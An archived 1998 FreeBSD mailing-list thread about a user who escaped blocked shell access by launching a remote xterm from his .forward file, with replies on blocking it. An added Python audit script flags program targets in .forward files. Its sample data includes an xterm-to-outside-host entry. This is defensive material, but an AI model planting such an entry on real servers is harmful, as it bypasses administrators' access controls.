Date: Fri, 4 Dec 1998 13:38:50 -0800 (PST)
From: Keyser Soze
To: mike grommet
cc: freebsd-questions@FreeBSD.ORG
Subject: Re: Advice on sendmail / execution of programs through .forward

also, you could change the perms on the xterm binary to not allow
execution, for a very quick solution.

On Fri, 4 Dec 1998, Keyser Soze wrote:

> you can block access to port 6000 out (if you have a firewall). This will
> prevent the xterm from writing to XServers outside your firewall.
>
> On Fri, 4 Dec 1998, mike grommet wrote:
>
> > Hi guys, I need some advice...
> >
> > I block off shell access to my primary server...
> > however one of my users pulled a sneaky one.
> >
> > He executed an xterm shell from his .forward and had it connect to his X
> > server on his personal PC... pretty slick actually, I have to give him that.
> > I never even considered it.
> >
> > Well, naturally I am a bit concerned about this...
> > this particular user is quite benevolent, but what about next time?
> >
> > I mean, it seems quite possible for a user to upload some sort of exploit
> > and an appropriate .forward via ftp, send mail to himself and WHAM. Life
> > gets real bad.
> >
> > Now, it's quite convenient to be able to run programs from .forward, procmail
> > comes to mind immediately...
> >
> > So what do you guys suggest to fix this problem the right way?
> >
> > Mike Grommet
> > Unix Systems Administrator
> > Internet Solutions, Inc.
> > mgrommet@insolwwb.net

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
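
The risk discussed in this thread, a .forward that hands incoming mail to a program, can be audited for. The script below is an added example, not part of the original thread: it lists every program target in users' .forward files and, going slightly beyond the case above, file and :include: targets too. The `*/.forward` home layout, the sample users and the binary paths are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Target prefixes that make sendmail do something other than forward to an address.
KINDS = (("|", "program"), ("/", "file"), (":include:", "include"))

def forward_targets(text):
    """Split .forward text into targets on newlines and unquoted commas."""
    raw = re.findall(r'(?:"[^"\n]*"|[^,\n])+', text)
    return [t for t in (r.replace('"', "").strip() for r in raw) if t]

def classify(target):
    """Return "program", "file", "include" or "address" for one target."""
    for prefix, kind in KINDS:
        if target.startswith(prefix):
            return kind
    return "address"

def audit_homes(home_root):
    """Return (user, kind, target) for every non-address target found."""
    findings = []
    for fwd in sorted(Path(home_root).glob("*/.forward")):
        if not fwd.is_file():
            continue
        text = fwd.read_text(errors="replace")
        findings += [(fwd.parent.name, classify(t), t)
                     for t in forward_targets(text) if classify(t) != "address"]
    return findings

def build_sample_homes():
    """Constructed sample tree: three users, two with program targets."""
    root = Path(tempfile.mkdtemp())
    samples = {
        "alice": "alice@example.org\n",
        "bob": '\\bob, "|/usr/local/bin/procmail -f-"\n',
        "carol": '"|/usr/X11R6/bin/xterm -display pc.example.org:0"\n',
    }
    for user, text in samples.items():
        (root / user).mkdir()
        (root / user / ".forward").write_text(text)
    return root

if __name__ == "__main__":
    for finding in audit_homes(build_sample_homes()):
        print(*finding, sep="\t")
```

Point `audit_homes` at the real home directory root to get the list of targets to review; an expected entry such as procmail shows up alongside an unexpected one such as xterm, so the output is a review list rather than a verdict.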